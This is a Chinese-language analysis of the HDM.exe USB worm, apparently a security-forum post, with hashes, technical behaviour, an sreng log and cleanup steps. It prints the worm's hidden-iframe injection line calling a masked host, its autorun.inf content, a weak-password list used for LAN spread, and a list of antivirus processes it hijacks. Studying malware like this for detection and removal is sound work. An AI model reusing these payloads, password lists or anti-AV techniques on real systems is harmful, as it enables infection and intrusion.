这是一个恶性的U盘病毒,其破坏力巨大,主要表现在以下几个方面: 1.使用恢复SSDT的方式破坏杀毒软件 2.IFEO映像劫持 3.关闭指定窗口 4.删除gho文件 5.破坏安全模式,以及显示隐藏文件功能 6.感染htm等网页文件 7.猜测密码通过局域网传播 8.通过U盘等移动存储传播 9.arp欺骗
具体分析如下: File: HDM.exe Size: 13312 bytes Modified: 2007年11月28日, 16:52:08 MD5: 7EC36FA2BCFC1EA72C26B74C928C78F6 SHA1: B60048A8F9DB67EDF4B94BFE4DA2A1906CD33B59 CRC32: 88D8970A
技术细节: 1.病毒运行后,释放如下文件以及副本: C:\WINDOWS\system32\Winlogon.dll C:\RESSDT.sys 遍历所有磁盘分区 在磁盘根目录下写入HDM.exe和autorun.inf 以达到通过U盘等移动存储传播的目的
同时建立服务RESSDT 服务相关描述: 启动类型:手动 映像文件路径:c:\RESSDT.sys" 显示名称:"RESSDT" 之后加载该驱动 该驱动能够使得某些杀毒软件的API hook失效
2.释放一个GetIp.bat到病毒所在目录下,从而获得IP地址
3.利用ping命令探测同一网段内的其他机器,并把结果写入c:\EnumHost.txt
4.如果查找到同一网段内的其他机器,则通过枚举用户名和密码的方式将HDM.exe复制到其他机器的C,D,E,F盘的根目录下 枚举的用户名和密码如下: home movie alex love xp 123 administrator new guest user game time yeah money xpuser
123456 qwerty abc123 memory 12345678 88888 5201314 1314520 asdfgh angel asdf baby woaini
之后会利用获得当前机器的时间 并利用at命令定时启动该病毒
5.获得系统目录,下载http://*/arp.exe和http://*/winpcap.exe 到系统目录下面 winpcap.exe是嗅探器 arp.exe具有arp欺骗功能,可以向局域网中的其它机器的80端口加入http://www.*/wm.htm的iframe代码
6.遍历磁盘所有分区下面的html,htm,asp,aspx,php,jsp文件 在其尾部加入<iframe src=http://www.*/wm.htm width=0 height=0></iframe>的代码
7.遍历所有磁盘分区删除gho文件
8.在software\microsoft\windows nt\currentversion\image file execution options\下面添加IFEO项目,劫持某些杀毒软件 360rpt.exe 360Safe.exe 360tray.exe adam.exe AgentSvr.exe AppSvc32.exe autoruns.exe avgrssvc.exe AvMonitor.exe avp.com avp.exe CCenter.exe ccSvcHst.exe FileDsty.exe FrameworkServices.exe FTCleanerShell.exe HijackThis.exe IceSword.exe iparmo.exe Iparmor.exe isPwdSvc.exe kabaload.exe KaScrScn.SCR KASMain.exe KASTask.exe KAV32.exe KAVDX.exe KAVPFW.exe KAVSetup.exe KAVStart.exe KISLnchr.exe KMailMon.exe KMFilter.exe kmp.exe KPFW32.exe KPFW32X.exe KPFWSvc.exe KRegEx.exe KRepair.COM KsLoader.exe KVCenter.kxp KvDetect.exe KvfwMcl.exe KVMonXP.kxp KVMonXP_1.kxp kvol.exe kvolself.exe KvReport.kxp KVScan.kxp KVSrvXP.exe KVStub.kxp kvupload.exe kvwsc.exe KvXP.kxp KvXP_1.kxp KWatch.exe KWatch9x.exe KWatchX.exe loaddll.exe MagicSet.exe mcconsol.exe Mcshield.exe mmqczj.exe mmsk.exe MPMon.exe MPSVC.exe MPSVC1.exe MPSVC2.exe naPrdMgr.exe NAVSetup.exe nod32krn.exe nod32kui.exe PFW.exe PFWLiveUpdate.exe QHSET.exe Ras.exe Rav.exe RavMon.exe RavMonD.exe RavStub.exe RavTask.exe RegClean.exe regedit.exe rfwcfg.exe RfwMain.exe rfwProxy.exe rfwsrv.exe RsAgent.exe Rsaupd.exe runiep.exe safelive.exe scan32.exe shcfg32.exe shstat.exe SmartUp.exe SREng.exe SWEEP95.exe symlcsvc.exe SysSafe.exe Tbmon.exe TBSCAN.exe TERegPct.exe TrojanDetector.exe Trojanwall.exe TrojDie.kxp UIHost.exe UmxAgent.exe UmxAttachment.exe UmxCfg.exe UmxFwHlp.exe UmxPol.exe UpdateUI.exe UpLive.EXE.exe VsTskMgr.exe WEBSCANX.exe WoptiClean.exe ZONEALARM.exe zxsweep.exe _AVP32.EXE _AVPCC.EXE _AVPM.EXE
9.将HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue的值改为0x00000001 破坏显示隐藏文件
10.删除system\currentcontrolset\control\safeboot\network 和system\currentcontrolset\control\safeboot\minimal键 破坏安全模式
11.查找指定窗口的名称,并将其关闭 安全卫士 扫描 专杀 注册表 process 进程 毒 木马 防御 防火墙 病毒 检测 firewall virus anti 金山 江民 卡巴斯基 worm 杀毒
12.启动c:\program files\internet explorer\iexplore.exe下载木马 下载http://www.*/1.exe~http://www.*/6.exe 到temp文件夹下面分别命名为downfile.exe~downfile5.exe 其中的1.exe又是一个木马下载器,它可以下载很多木马,但测试中并未植入成功...
13.同时在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run下面添加注册表项目 <calc.exe><%SystemRoot%\system32\calc.exe>使得calc.exe开机启动 但不知具体有什么作用...
14.在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Winlogon下面添加注册表项目 <WinlogonNotify: Winlogon><C:\WINDOWS\system32\Winlogon.dll> []
15.病毒体内有文字:“nofixups!”“just test !”
全部木马和病毒植入完毕后的sreng日志如下: 启动项目 注册表 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run <calc.exe><%SystemRoot%\system32\calc.exe> [(Verified)Microsoft Windows Publisher] <Cifmon><C:\WINDOWS\system32\Server.EXE> [] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Winlogon] <WinlogonNotify: Winlogon><C:\WINDOWS\system32\Winlogon.dll> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe] <IFEO[360rpt.exe]><C:\HDM.exe> [] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe] <IFEO[360Safe.exe]><C:\HDM.exe> []...
================================== 驱动程序 [RAS Asynchronous Media Driver / AsyncMac][Stopped/Auto Start] <system32\DRIVERS\comint32.sys><N/A> [MS / MS][Stopped/Manual Start] <\??\C:\DOCUME~1\NEWCEN~1\LOCALS~1\Temp\tmp13.tmp><N/A> [RESSDT / RESSDT][Stopped/Manual Start] <\??\c:\RESSDT.sys><N/A> [usbmouseb / usbmouseb][Running/Manual Start] <\??\C:\WINDOWS\SYSTEM32\drivers\smbins.sys><N/A> ================================== 正在运行的进程 [PID: 1148][C:\Program Files\Internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-
2158)] [C:\WINDOWS\system32\Insert.dll] [N/A, ] [PID: 1428][C:\WINDOWS\explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)] [C:\WINDOWS\SYSTEM32\smbins.dll] [Microsoft Corporation, 5, 0, 2195, 3649] ================================== Autorun.inf [C:\] [AutoRun] OPEN=HDM.exe shellopen=打开(&O) shellopenCommand=HDM.exe shellopenDefault=1 shellexplore=资源管理器(&X) shell\explore\command=HDM.exe [D:\] [AutoRun] OPEN=HDM.exe shellopen=打开(&O) shellopenCommand=HDM.exe shellopenDefault=1 shellexplore=资源管理器(&X) shell\explore\command=HDM.exe
某些木马没有植入成功,所以无法体现
解决方法:
到down.45it.com下载sreng和Xdelbox
1.解压Xdelbox所有文件到一个文件夹 在 添加旁边的框中 分别输入 %systemroot%\system32\DRIVERS\comint32.sys %systemroot%\system32\Server.EXE %systemroot%\system32\Winlogon.dll c:\RESSDT.sys %systemroot%\system32\drivers\smbins.sys %systemroot%\system32\Insert.dll %systemroot%\SYSTEM32\smbins.dll 输入完一个以后 点击旁边的添加 按钮 被添加的文件 将出现在下面的大框中 然后一次性选中 (按住ctrl)下面大框中所有的文件 右键 单击 点击 重启立即删除
卸载winpcap.exe软件
2.重启计算机后 打开sreng 启动项目 注册表 删除如下项目 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run <calc.exe><%SystemRoot%\system32\calc.exe> [(Verified)Microsoft Windows Publisher] <Cifmon><C:\WINDOWS\system32\Server.EXE> [] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Winlogon] <WinlogonNotify: Winlogon><C:\WINDOWS\system32\Winlogon.dll> [] 删除所有红色的IFEO项目
在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”, 选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”: [RAS Asynchronous Media Driver / AsyncMac][Stopped/Auto Start] <system32\DRIVERS\comint32.sys><N/A> [MS / MS][Stopped/Manual Start] <\??\C:\DOCUME~1\NEWCEN~1\LOCALS~1\Temp\tmp13.tmp><N/A> [RESSDT / RESSDT][Stopped/Manual Start] <\??\c:\RESSDT.sys><N/A> [usbmouseb / usbmouseb][Running/Manual Start] <\??\C:\WINDOWS\SYSTEM32\drivers\smbins.sys><N/A>
系统修复-Windows Shell/IE 全选 点击修复 系统修复-高级修复-修复安全模式
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定 点击 菜单栏下方的 文件夹按钮(搜索右边的按钮) 在左边的资源管理器中单击打开所有磁盘分区 分别删除其根目录下的HDM.exe和autorun.inf
3.修复被感染的网页文件 推荐使用iframkill(可到down.45it.com下载)
截至到目前,还没有一个杀毒软件报出这个病毒
由于这是一个比较恶性的病毒,一旦流行开来后果将不堪设想,因此希望大家做好以下工作防范类似病毒出现 1.打全系统补丁,及时升级杀毒软件和防火墙并打开实时监控功能 2.给系统设定一个复杂的密码 3.关闭自动播放,阻止类似通过U盘传播的病毒的侵入
|